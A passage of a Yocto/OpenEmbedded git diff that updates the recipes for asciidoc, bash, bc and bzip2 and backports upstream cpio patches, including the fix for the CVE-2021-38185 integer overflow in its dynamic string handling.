diff options
Diffstat (limited to 'meta/recipes-extended')
106 files changed, 6354 insertions, 50 deletions
diff --git a/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch new file mode 100644 index 0000000000..14c1cd806e --- /dev/null +++ b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch @@ -0,0 +1,42 @@ +From 44d2d6095246124c024230f89c1029794491839f Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Miro=20Hron=C4=8Dok?= <miro@hroncok.cz> +Date: Fri, 30 Oct 2020 15:10:35 +0100 +Subject: [PATCH] Properly detect and compare Python version 3.10+ (#151) + +Upstream commit: https://github.com/asciidoc-py/asciidoc-py/commit/44d2d6095246124c024230f89c1029794491839f + +Slightly modified to cleanly apply to asciidoc 8.6.9: +- VERSION and MIN_PYTHON_VERSION changed to reflect values in 8.6.9 +- line numbers corrected to eliminate offset warnings + +Upstream-Status: Backport +Signed-off-by: Steve Sakoman <steve@sakoman.com> + +--- + asciidoc.py | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/asciidoc.py b/asciidoc.py +index f960e7d8..42868c4b 100755 +--- a/asciidoc.py ++++ b/asciidoc.py +@@ -30,7 +30,7 @@ + # Used by asciidocapi.py # + VERSION = '8.6.10' # See CHANGELOG file for version history. + +-MIN_PYTHON_VERSION = '3.4' # Require this version of Python or better. ++MIN_PYTHON_VERSION = (3, 4) # Require this version of Python or better. + + # --------------------------------------------------------------------------- + # Program constants. +@@ -4704,8 +4704,8 @@ def init(self, cmd): + directory. + cmd is the asciidoc command or asciidoc.py path. + """ +- if float(sys.version[:3]) < float(MIN_PYTHON_VERSION): +- message.stderr('FAILED: Python %s or better required' % MIN_PYTHON_VERSION) ++ if sys.version_info[:2] < MIN_PYTHON_VERSION: ++ message.stderr('FAILED: Python %d.%d or better required' % MIN_PYTHON_VERSION) + sys.exit(1) + if not os.path.exists(cmd): + message.stderr('FAILED: Missing asciidoc command: %s' % cmd) diff --git a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb index 932339f739..325ff9aa15 100644 --- a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb +++ b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb @@ -8,8 +8,9 @@ LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b \ file://COPYRIGHT;md5=029ad5428ba5efa20176b396222d4069" -SRC_URI = "git://github.com/asciidoc/asciidoc-py3;protocol=https;branch=main \ - file://auto-catalogs.patch" +SRC_URI = "git://github.com/asciidoc/asciidoc-py;protocol=https;branch=main \ + file://auto-catalogs.patch \ + file://detect-python-version.patch" SRCREV = "618f6e6f6b558ed1e5f2588cd60a5a6b4f881ca0" PV .= "+py3-git${SRCPV}" diff --git a/meta/recipes-extended/bash/bash.inc b/meta/recipes-extended/bash/bash.inc index c7cf8cddd3..4e6176d2e6 100644 --- a/meta/recipes-extended/bash/bash.inc +++ b/meta/recipes-extended/bash/bash.inc @@ -49,6 +49,11 @@ do_compile_ptest () { oe_runmake buildtest } +do_install_prepend () { + # Ensure determinism as this counter increases for each make call + rm -f ${B}/.build +} + do_install_append () { # Move /usr/bin/bash to /bin/bash, if need if [ "${base_bindir}" != "${bindir}" ]; then diff --git a/meta/recipes-extended/bc/bc_1.07.1.bb b/meta/recipes-extended/bc/bc_1.07.1.bb index ff3e8f4409..8ed10d14c2 100644 --- a/meta/recipes-extended/bc/bc_1.07.1.bb +++ b/meta/recipes-extended/bc/bc_1.07.1.bb @@ -32,4 +32,4 @@ do_compile_prepend() { ALTERNATIVE_${PN} = "bc dc" ALTERNATIVE_PRIORITY = "100" -BBCLASSEXTEND = "native" +BBCLASSEXTEND = "native nativesdk" diff --git a/meta/recipes-extended/bzip2/bzip2/Makefile.am b/meta/recipes-extended/bzip2/bzip2/Makefile.am index dcf64584d9..adc85a62b2 100644 --- a/meta/recipes-extended/bzip2/bzip2/Makefile.am +++ b/meta/recipes-extended/bzip2/bzip2/Makefile.am @@ -1,6 +1,6 @@ lib_LTLIBRARIES = libbz2.la -libbz2_la_LDFLAGS = -version-info 1:6:0 +libbz2_la_LDFLAGS = -version-info 1:8:0 libbz2_la_SOURCES = blocksort.c \ huffman.c \ diff --git a/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch new file mode 100644 index 0000000000..2dfd348d7c --- /dev/null +++ b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch @@ -0,0 +1,58 @@ +From d257e47a6c6b41ba727b196ac96c05ab91bd9d65 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Fri, 7 Apr 2023 11:23:37 +0300 +Subject: [PATCH 3/4] Fix calculation of CRC in copy-out mode. + +* src/copyout.c (read_for_checksum): Fix type of the file_size argument. +Rewrite the reading loop. + +Original patch by Stefano Babic <sbabic@denx.de> + +Upstream-Status: Backport [a1b2f7871c3ae5113e0102b870b15ea06a8f0e3d] +Signed-off-by: Marek Vasut <marex@denx.de> +--- + src/copyout.c | 16 +++++++--------- + 1 file changed, 7 insertions(+), 9 deletions(-) + +diff --git a/src/copyout.c b/src/copyout.c +index 8b0beb6..f1ff351 100644 +--- a/src/copyout.c ++++ b/src/copyout.c +@@ -34,27 +34,25 @@ + compute and return a checksum for them. */ + + static uint32_t +-read_for_checksum (int in_file_des, int file_size, char *file_name) ++read_for_checksum (int in_file_des, off_t file_size, char *file_name) + { + uint32_t crc; +- char buf[BUFSIZ]; +- int bytes_left; +- int bytes_read; +- int i; ++ unsigned char buf[BUFSIZ]; ++ ssize_t bytes_read; ++ ssize_t i; + + crc = 0; + +- for (bytes_left = file_size; bytes_left > 0; bytes_left -= bytes_read) ++ while (file_size > 0) + { + bytes_read = read (in_file_des, buf, BUFSIZ); + if (bytes_read < 0) + error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name); + if (bytes_read == 0) + break; +- if (bytes_left < bytes_read) +- bytes_read = bytes_left; +- for (i = 0; i < bytes_read; ++i) ++ for (i = 0; i < bytes_read; i++) + crc += buf[i] & 0xff; ++ file_size -= bytes_read; + } + if (lseek (in_file_des, 0L, SEEK_SET)) + error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name); +-- +2.39.2 + diff --git a/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch new file mode 100644 index 0000000000..c212bddf7d --- /dev/null +++ b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch @@ -0,0 +1,312 @@ +From 8513495ab5cfb63eb7c4c933fdf0b78c6196cd27 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Fri, 28 Apr 2023 15:23:46 +0300 +Subject: [PATCH 4/4] Fix appending to archives bigger than 2G + +* src/extern.h (last_header_start): Change type to off_t. +* src/global.c: Likewise. +* src/util.c (prepare_append): Use off_t for file offsets. + +Upstream-Status: Backport [0987d63384f0419b4b14aecdc6a61729b75ce86a] +Signed-off-by: Marek Vasut <marex@denx.de> +--- + src/extern.h | 11 ++++----- + src/global.c | 2 +- + src/util.c | 66 ++++++++++++++++++++++++++-------------------------- + 3 files changed, 39 insertions(+), 40 deletions(-) + +diff --git a/src/extern.h b/src/extern.h +index 11ac6bf..12f14a9 100644 +--- a/src/extern.h ++++ b/src/extern.h +@@ -67,7 +67,7 @@ extern int ignore_devno_option; + + extern bool to_stdout_option; + +-extern int last_header_start; ++extern off_t last_header_start; + extern int copy_matching_files; + extern int numeric_uid; + extern char *pattern_file_name; +@@ -123,7 +123,7 @@ void field_width_error (const char *filename, const char *fieldname, + + /* copypass.c */ + void process_copy_pass (void); +-int link_to_maj_min_ino (char *file_name, int st_dev_maj, ++int link_to_maj_min_ino (char *file_name, int st_dev_maj, + int st_dev_min, ino_t st_ino); + int link_to_name (char const *link_name, char const *link_target); + +@@ -171,7 +171,7 @@ void copy_files_tape_to_disk (int in_des, int out_des, off_t num_bytes); + void copy_files_disk_to_tape (int in_des, int out_des, off_t num_bytes, char *filename); + void copy_files_disk_to_disk (int in_des, int out_des, off_t num_bytes, char *filename); + void warn_if_file_changed (char *file_name, off_t old_file_size, +- time_t old_file_mtime); ++ time_t old_file_mtime); + void create_all_directories (char const *name); + void prepare_append (int out_file_des); + char *find_inode_file (ino_t node_num, +@@ -185,7 +185,7 @@ void set_new_media_message (char *message); + #ifdef HPUX_CDF + char *add_cdf_double_slashes (char *filename); + #endif +-void write_nuls_to_file (off_t num_bytes, int out_des, ++void write_nuls_to_file (off_t num_bytes, int out_des, + void (*writer) (char *in_buf, + int out_des, off_t num_bytes)); + #define DISK_IO_BLOCK_SIZE 512 +@@ -229,6 +229,5 @@ void delay_set_stat (char const *file_name, struct stat *st, + mode_t invert_permissions); + int repair_delayed_set_stat (struct cpio_file_stat *file_hdr); + void apply_delayed_set_stat (void); +- +-int arf_stores_inode_p (enum archive_format arf); + ++int arf_stores_inode_p (enum archive_format arf); +diff --git a/src/global.c b/src/global.c +index fb3abe9..5c9fc05 100644 +--- a/src/global.c ++++ b/src/global.c +@@ -114,7 +114,7 @@ int debug_flag = false; + + /* File position of last header read. Only used during -A to determine + where the old TRAILER!!! record started. */ +-int last_header_start = 0; ++off_t last_header_start = 0; + + /* With -i; if true, copy only files that match any of the given patterns; + if false, copy only files that do not match any of the patterns. (-f) */ +diff --git a/src/util.c b/src/util.c +index 4421b20..3be89a4 100644 +--- a/src/util.c ++++ b/src/util.c +@@ -60,8 +60,8 @@ tape_empty_output_buffer (int out_des) + static long output_bytes_before_lseek = 0; + + /* Some tape drivers seem to have a signed internal seek pointer and +- they lose if it overflows and becomes negative (e.g. when writing +- tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the ++ they lose if it overflows and becomes negative (e.g. when writing ++ tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the + seek pointer and prevent it from overflowing. */ + if (output_is_special + && ( (output_bytes_before_lseek += output_size) >= 1073741824L) ) +@@ -106,7 +106,7 @@ static ssize_t sparse_write (int fildes, char *buf, size_t nbyte, bool flush); + descriptor OUT_DES and reset `output_size' and `out_buff'. + If `swapping_halfwords' or `swapping_bytes' is set, + do the appropriate swapping first. Our callers have +- to make sure to only set these flags if `output_size' ++ to make sure to only set these flags if `output_size' + is appropriate (a multiple of 4 for `swapping_halfwords', + 2 for `swapping_bytes'). The fact that DISK_IO_BLOCK_SIZE + must always be a multiple of 4 helps us (and our callers) +@@ -188,8 +188,8 @@ tape_fill_input_buffer (int in_des, int num_bytes) + { + #ifdef BROKEN_LONG_TAPE_DRIVER + /* Some tape drivers seem to have a signed internal seek pointer and +- they lose if it overflows and becomes negative (e.g. when writing +- tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the ++ they lose if it overflows and becomes negative (e.g. when writing ++ tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the + seek pointer and prevent it from overflowing. */ + if (input_is_special + && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) ) +@@ -332,8 +332,8 @@ tape_buffered_peek (char *peek_buf, int in_des, int num_bytes) + + #ifdef BROKEN_LONG_TAPE_DRIVER + /* Some tape drivers seem to have a signed internal seek pointer and +- they lose if it overflows and becomes negative (e.g. when writing +- tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the ++ they lose if it overflows and becomes negative (e.g. when writing ++ tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the + seek pointer and prevent it from overflowing. */ + if (input_is_special + && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) ) +@@ -404,7 +404,7 @@ tape_toss_input (int in_des, off_t num_bytes) + + if (crc_i_flag && only_verify_crc_flag) + { +- int k; ++ int k; + for (k = 0; k < space_left; ++k) + crc += in_buff[k] & 0xff; + } +@@ -416,14 +416,14 @@ tape_toss_input (int in_des, off_t num_bytes) + } + + void +-write_nuls_to_file (off_t num_bytes, int out_des, +- void (*writer) (char *in_buf, int out_des, off_t num_bytes)) ++write_nuls_to_file (off_t num_bytes, int out_des, ++ void (*writer) (char *in_buf, int out_des, off_t num_bytes)) + { + off_t blocks; + off_t extra_bytes; + off_t i; + static char zeros_512[512]; +- ++ + blocks = num_bytes / sizeof zeros_512; + extra_bytes = num_bytes % sizeof zeros_512; + for (i = 0; i < blocks; ++i) +@@ -603,7 +603,7 @@ create_all_directories (char const *name) + char *dir; + + dir = dir_name (name); +- ++ + if (dir == NULL) + error (PAXEXIT_FAILURE, 0, _("virtual memory exhausted")); + +@@ -637,9 +637,9 @@ create_all_directories (char const *name) + void + prepare_append (int out_file_des) + { +- int start_of_header; +- int start_of_block; +- int useful_bytes_in_block; ++ off_t start_of_header; ++ off_t start_of_block; ++ size_t useful_bytes_in_block; + char *tmp_buf; + + start_of_header = last_header_start; +@@ -697,8 +697,8 @@ inode_val_compare (const void *val1, const void *val2) + const struct inode_val *ival1 = val1; + const struct inode_val *ival2 = val2; + return ival1->inode == ival2->inode +- && ival1->major_num == ival2->major_num +- && ival1->minor_num == ival2->minor_num; ++ && ival1->major_num == ival2->major_num ++ && ival1->minor_num == ival2->minor_num; + } + + static struct inode_val * +@@ -706,10 +706,10 @@ find_inode_val (ino_t node_num, unsigned long major_num, + unsigned long minor_num) + { + struct inode_val sample; +- ++ + if (!hash_table) + return NULL; +- ++ + sample.inode = node_num; + sample.major_num = major_num; + sample.minor_num = minor_num; +@@ -734,7 +734,7 @@ add_inode (ino_t node_num, char *file_name, unsigned long major_num, + { + struct inode_val *temp; + struct inode_val *e = NULL; +- ++ + /* Create new inode record. */ + temp = (struct inode_val *) xmalloc (sizeof (struct inode_val)); + temp->inode = node_num; +@@ -1007,7 +1007,7 @@ buf_all_zeros (char *buf, int bufsize) + + /* Write NBYTE bytes from BUF to file descriptor FILDES, trying to + create holes instead of writing blockfuls of zeros. +- ++ + Return the number of bytes written (including bytes in zero + regions) on success, -1 on error. + +@@ -1027,7 +1027,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush) + + enum { begin, in_zeros, not_in_zeros } state = + delayed_seek_count ? in_zeros : begin; +- ++ + while (nbytes) + { + size_t rest = nbytes; +@@ -1042,7 +1042,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush) + if (state == not_in_zeros) + { + ssize_t bytes = buf - start_ptr + rest; +- ++ + n = write (fildes, start_ptr, bytes); + if (n == -1) + return -1; +@@ -1091,8 +1091,8 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush) + if (n != 1) + return n; + delayed_seek_count = 0; +- } +- ++ } ++ + return nwritten + seek_count; + } + +@@ -1222,7 +1222,7 @@ set_perms (int fd, struct cpio_file_stat *header) + if (!no_chown_flag) + { + uid_t uid = CPIO_UID (header->c_uid); +- gid_t gid = CPIO_GID (header->c_gid); ++ gid_t gid = CPIO_GID (header->c_gid); + if ((fchown_or_chown (fd, header->c_name, uid, gid) < 0) + && errno != EPERM) + chown_error_details (header->c_name, uid, gid); +@@ -1239,13 +1239,13 @@ set_file_times (int fd, + const char *name, unsigned long atime, unsigned long mtime) + { + struct timespec ts[2]; +- ++ + memset (&ts, 0, sizeof ts); + + ts[0].tv_sec = atime; + ts[1].tv_sec = mtime; + +- /* Silently ignore EROFS because reading the file won't have upset its ++ /* Silently ignore EROFS because reading the file won't have upset its + timestamp if it's on a read-only filesystem. */ + if (fdutimens (fd, name, ts) < 0 && errno != EROFS) + utime_error (name); +@@ -1297,7 +1297,7 @@ cpio_safer_name_suffix (char *name, bool link_target, bool absolute_names, + + /* This is a simplified form of delayed set_stat used by GNU tar. + With the time, both forms will merge and pass to paxutils +- ++ + List of directories whose statuses we need to extract after we've + finished extracting their subsidiary files. If you consider each + contiguous subsequence of elements of the form [D]?[^D]*, where [D] +@@ -1415,7 +1415,7 @@ cpio_mkdir (struct cpio_file_stat *file_hdr, int *setstat_delayed) + { + int rc; + mode_t mode = file_hdr->c_mode; +- ++ + if (!(file_hdr->c_mode & S_IWUSR)) + { + rc = mkdir (file_hdr->c_name, mode | S_IWUSR); +@@ -1438,10 +1438,10 @@ cpio_create_dir (struct cpio_file_stat *file_hdr, int existing_dir) + { + int res; /* Result of various function calls. */ + int setstat_delayed = 0; +- ++ + if (to_stdout_option) + return 0; +- ++ + /* Strip any trailing `/'s off the filename; tar puts + them on. We might as well do it here in case anybody + else does too, since they cause strange things to happen. */ +@@ -1530,7 +1530,7 @@ arf_stores_inode_p (enum archive_format arf) + } + return 1; + } +- ++ + void + cpio_file_stat_init (struct cpio_file_stat *file_hdr) + { +-- +2.39.2 + diff --git a/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch new file mode 100644 index 0000000000..6ceafeee49 --- /dev/null +++ b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch @@ -0,0 +1,581 @@ +GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted +pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers +an out-of-bounds heap write. + +CVE: CVE-2021-38185 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Sat, 7 Aug 2021 12:52:21 +0300 +Subject: [PATCH 1/3] Rewrite dynamic string support. + +* src/dstring.c (ds_init): Take a single argument. +(ds_free): New function. +(ds_resize): Take a single argument. Use x2nrealloc to expand +the storage. +(ds_reset,ds_append,ds_concat,ds_endswith): New function. +(ds_fgetstr): Rewrite. In particular, this fixes integer overflow. +* src/dstring.h (dynamic_string): Keep both the allocated length +(ds_size) and index of the next free byte in the string (ds_idx). +(ds_init,ds_resize): Change signature. +(ds_len): New macro. +(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos. +* src/copyin.c: Use new ds_ functions. +* src/copyout.c: Likewise. +* src/copypass.c: Likewise. +* src/util.c: Likewise. +--- + src/copyin.c | 40 +++++++++++------------ + src/copyout.c | 16 ++++----- + src/copypass.c | 34 +++++++++---------- + src/dstring.c | 88 ++++++++++++++++++++++++++++++++++++-------------- + src/dstring.h | 31 +++++++++--------- + src/util.c | 6 ++-- + 6 files changed, 123 insertions(+), 92 deletions(-) + +diff --git a/src/copyin.c b/src/copyin.c +index b29f348..37e503a 100644 +--- a/src/copyin.c ++++ b/src/copyin.c +@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out, + char *str_res; /* Result for string function. */ + static dynamic_string new_name; /* New file name for rename option. */ + static int initialized_new_name = false; ++ + if (!initialized_new_name) +- { +- ds_init (&new_name, 128); +- initialized_new_name = true; +- } ++ { ++ ds_init (&new_name); ++ initialized_new_name = true; ++ } + + if (rename_flag) + { +@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name) + already in `save_patterns' (from the command line) are preserved. */ + + static void +-read_pattern_file () ++read_pattern_file (void) + { +- int max_new_patterns; +- char **new_save_patterns; +- int new_num_patterns; ++ char **new_save_patterns = NULL; ++ size_t max_new_patterns; ++ size_t new_num_patterns; + int i; +- dynamic_string pattern_name; ++ dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER; + FILE *pattern_fp; + + if (num_patterns < 0) + num_patterns = 0; +- max_new_patterns = 1 + num_patterns; +- new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *)); + new_num_patterns = num_patterns; +- ds_init (&pattern_name, 128); ++ max_new_patterns = num_patterns; ++ new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0])); + + pattern_fp = fopen (pattern_file_name, "r"); + if (pattern_fp == NULL) + open_fatal (pattern_file_name); + while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL) + { +- if (new_num_patterns >= max_new_patterns) +- { +- max_new_patterns += 1; +- new_save_patterns = (char **) +- xrealloc ((char *) new_save_patterns, +- max_new_patterns * sizeof (char *)); +- } ++ if (new_num_patterns == max_new_patterns) ++ new_save_patterns = x2nrealloc (new_save_patterns, ++ &max_new_patterns, ++ sizeof (new_save_patterns[0])); + new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string); + ++new_num_patterns; + } ++ ++ ds_free (&pattern_name); ++ + if (ferror (pattern_fp) || fclose (pattern_fp) == EOF) + close_error (pattern_file_name); + +@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count) + in the file system. */ + + void +-process_copy_in () ++process_copy_in (void) + { + char done = false; /* True if trailer reached. */ + FILE *tty_in = NULL; /* Interactive file for rename option. */ +diff --git a/src/copyout.c b/src/copyout.c +index 8b0beb6..26e3dda 100644 +--- a/src/copyout.c ++++ b/src/copyout.c +@@ -594,9 +594,10 @@ assign_string (char **pvar, char *value) + The format of the header depends on the compatibility (-c) flag. */ + + void +-process_copy_out () ++process_copy_out (void) + { +- dynamic_string input_name; /* Name of file read from stdin. */ ++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of file read from stdin. */ + struct stat file_stat; /* Stat record for file. */ + struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER; + /* Output header information. */ +@@ -605,7 +606,6 @@ process_copy_out () + char *orig_file_name = NULL; + + /* Initialize the copy out. */ +- ds_init (&input_name, 128); + file_hdr.c_magic = 070707; + + /* Check whether the output file might be a tape. */ +@@ -657,14 +657,9 @@ process_copy_out () + { + if (file_hdr.c_mode & CP_IFDIR) + { +- int len = strlen (input_name.ds_string); + /* Make sure the name ends with a slash */ +- if (input_name.ds_string[len-1] != '/') +- { +- ds_resize (&input_name, len + 2); +- input_name.ds_string[len] = '/'; +- input_name.ds_string[len+1] = 0; +- } ++ if (!ds_endswith (&input_name, '/')) ++ ds_append (&input_name, '/'); + } + } + +@@ -875,6 +870,7 @@ process_copy_out () + (unsigned long) blocks), (unsigned long) blocks); + } + cpio_file_stat_free (&file_hdr); ++ ds_free (&input_name); + } + + +diff --git a/src/copypass.c b/src/copypass.c +index dc13b5b..62f31c6 100644 +--- a/src/copypass.c ++++ b/src/copypass.c +@@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st) + If `link_flag', link instead of copying. */ + + void +-process_copy_pass () ++process_copy_pass (void) + { +- dynamic_string input_name; /* Name of file from stdin. */ +- dynamic_string output_name; /* Name of new file. */ ++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of file from stdin. */ ++ dynamic_string output_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of new file. */ + size_t dirname_len; /* Length of `directory_name'. */ + int res; /* Result of functions. */ + char *slash; /* For moving past slashes in input name. */ +@@ -65,25 +67,18 @@ process_copy_pass () + created files */ + + /* Initialize the copy pass. */ +- ds_init (&input_name, 128); + + dirname_len = strlen (directory_name); + if (change_directory_option && !ISSLASH (directory_name[0])) + { + char *pwd = xgetcwd (); +- +- dirname_len += strlen (pwd) + 1; +- ds_init (&output_name, dirname_len + 2); +- strcpy (output_name.ds_string, pwd); +- strcat (output_name.ds_string, "/"); +- strcat (output_name.ds_string, directory_name); ++ ++ ds_concat (&output_name, pwd); ++ ds_append (&output_name, '/'); + } +- else +- { +- ds_init (&output_name, dirname_len + 2); +- strcpy (output_name.ds_string, directory_name); +- } +- output_name.ds_string[dirname_len] = '/'; ++ ds_concat (&output_name, directory_name); ++ ds_append (&output_name, '/'); ++ dirname_len = ds_len (&output_name); + output_is_seekable = true; + + change_dir (); +@@ -116,8 +111,8 @@ process_copy_pass () + /* Make the name of the new file. */ + for (slash = input_name.ds_string; *slash == '/'; ++slash) + ; +- ds_resize (&output_name, dirname_len + strlen (slash) + 2); +- strcpy (output_name.ds_string + dirname_len + 1, slash); ++ ds_reset (&output_name, dirname_len); ++ ds_concat (&output_name, slash); + + existing_dir = false; + if (lstat (output_name.ds_string, &out_file_stat) == 0) +@@ -333,6 +328,9 @@ process_copy_pass () + (unsigned long) blocks), + (unsigned long) blocks); + } ++ ++ ds_free (&input_name); ++ ds_free (&output_name); + } + + /* Try and create a hard link from FILE_NAME to another file +diff --git a/src/dstring.c b/src/dstring.c +index e9c063f..358f356 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -20,8 +20,8 @@ + #if defined(HAVE_CONFIG_H) + # include <config.h> + #endif +- + #include <stdio.h> ++#include <stdlib.h> + #if defined(HAVE_STRING_H) || defined(STDC_HEADERS) + #include <string.h> + #else +@@ -33,24 +33,41 @@ + /* Initialiaze dynamic string STRING with space for SIZE characters. */ + + void +-ds_init (dynamic_string *string, int size) ++ds_init (dynamic_string *string) ++{ ++ memset (string, 0, sizeof *string); ++} ++ ++/* Free the dynamic string storage. */ ++ ++void ++ds_free (dynamic_string *string) + { +- string->ds_length = size; +- string->ds_string = (char *) xmalloc (size); ++ free (string->ds_string); + } + +-/* Expand dynamic string STRING, if necessary, to hold SIZE characters. */ ++/* Expand dynamic string STRING, if necessary. */ + + void +-ds_resize (dynamic_string *string, int size) ++ds_resize (dynamic_string *string) + { +- if (size > string->ds_length) ++ if (string->ds_idx == string->ds_size) + { +- string->ds_length = size; +- string->ds_string = (char *) xrealloc ((char *) string->ds_string, size); ++ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, ++ 1); + } + } + ++/* Reset the index of the dynamic string S to LEN. */ ++ ++void ++ds_reset (dynamic_string *s, size_t len) ++{ ++ while (len > s->ds_size) ++ ds_resize (s); ++ s->ds_idx = len; ++} ++ + /* Dynamic string S gets a string terminated by the EOS character + (which is removed) from file F. S will increase + in size during the function if the string from F is longer than +@@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size) + char * + ds_fgetstr (FILE *f, dynamic_string *s, char eos) + { +- int insize; /* Amount needed for line. */ +- int strsize; /* Amount allocated for S. */ + int next_ch; + + /* Initialize. */ +- insize = 0; +- strsize = s->ds_length; ++ s->ds_idx = 0; + + /* Read the input string. */ +- next_ch = getc (f); +- while (next_ch != eos && next_ch != EOF) ++ while ((next_ch = getc (f)) != eos && next_ch != EOF) + { +- if (insize >= strsize - 1) +- { +- ds_resize (s, strsize * 2 + 2); +- strsize = s->ds_length; +- } +- s->ds_string[insize++] = next_ch; +- next_ch = getc (f); ++ ds_resize (s); ++ s->ds_string[s->ds_idx++] = next_ch; + } +- s->ds_string[insize++] = '\0'; ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = '\0'; + +- if (insize == 1 && next_ch == EOF) ++ if (s->ds_idx == 0 && next_ch == EOF) + return NULL; + else + return s->ds_string; + } + ++void ++ds_append (dynamic_string *s, int c) ++{ ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = c; ++ if (c) ++ { ++ s->ds_idx++; ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = 0; ++ } ++} ++ ++void ++ds_concat (dynamic_string *s, char const *str) ++{ ++ size_t len = strlen (str); ++ while (len + 1 > s->ds_size) ++ ds_resize (s); ++ memcpy (s->ds_string + s->ds_idx, str, len); ++ s->ds_idx += len; ++ s->ds_string[s->ds_idx] = 0; ++} ++ + char * + ds_fgets (FILE *f, dynamic_string *s) + { +@@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s) + { + return ds_fgetstr (f, s, '\0'); + } ++ ++/* Return true if the dynamic string S ends with character C. */ ++int ++ds_endswith (dynamic_string *s, int c) ++{ ++ return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c); ++} +diff --git a/src/dstring.h b/src/dstring.h +index b5135fe..f5b04ef 100644 +--- a/src/dstring.h ++++ b/src/dstring.h +@@ -17,10 +17,6 @@ + Software Foundation, Inc., 51 Franklin Street, Fifth Floor, + Boston, MA 02110-1301 USA. */ + +-#ifndef NULL +-#define NULL 0 +-#endif +- + /* A dynamic string consists of record that records the size of an + allocated string and the pointer to that string. The actual string + is a normal zero byte terminated string that can be used with the +@@ -30,22 +26,25 @@ + + typedef struct + { +- int ds_length; /* Actual amount of storage allocated. */ +- char *ds_string; /* String. */ ++ size_t ds_size; /* Actual amount of storage allocated. */ ++ size_t ds_idx; /* Index of the next free byte in the string. */ ++ char *ds_string; /* String storage. */ + } dynamic_string; + ++#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL } + +-/* Macros that look similar to the original string functions. +- WARNING: These macros work only on pointers to dynamic string records. +- If used with a real record, an "&" must be used to get the pointer. */ +-#define ds_strlen(s) strlen ((s)->ds_string) +-#define ds_strcmp(s1, s2) strcmp ((s1)->ds_string, (s2)->ds_string) +-#define ds_strncmp(s1, s2, n) strncmp ((s1)->ds_string, (s2)->ds_string, n) +-#define ds_index(s, c) index ((s)->ds_string, c) +-#define ds_rindex(s, c) rindex ((s)->ds_string, c) ++void ds_init (dynamic_string *string); ++void ds_free (dynamic_string *string); ++void ds_reset (dynamic_string *s, size_t len); + +-void ds_init (dynamic_string *string, int size); +-void ds_resize (dynamic_string *string, int size); ++/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */ + char *ds_fgetname (FILE *f, dynamic_string *s); + char *ds_fgets (FILE *f, dynamic_string *s); + char *ds_fgetstr (FILE *f, dynamic_string *s, char eos); ++void ds_append (dynamic_string *s, int c); ++void ds_concat 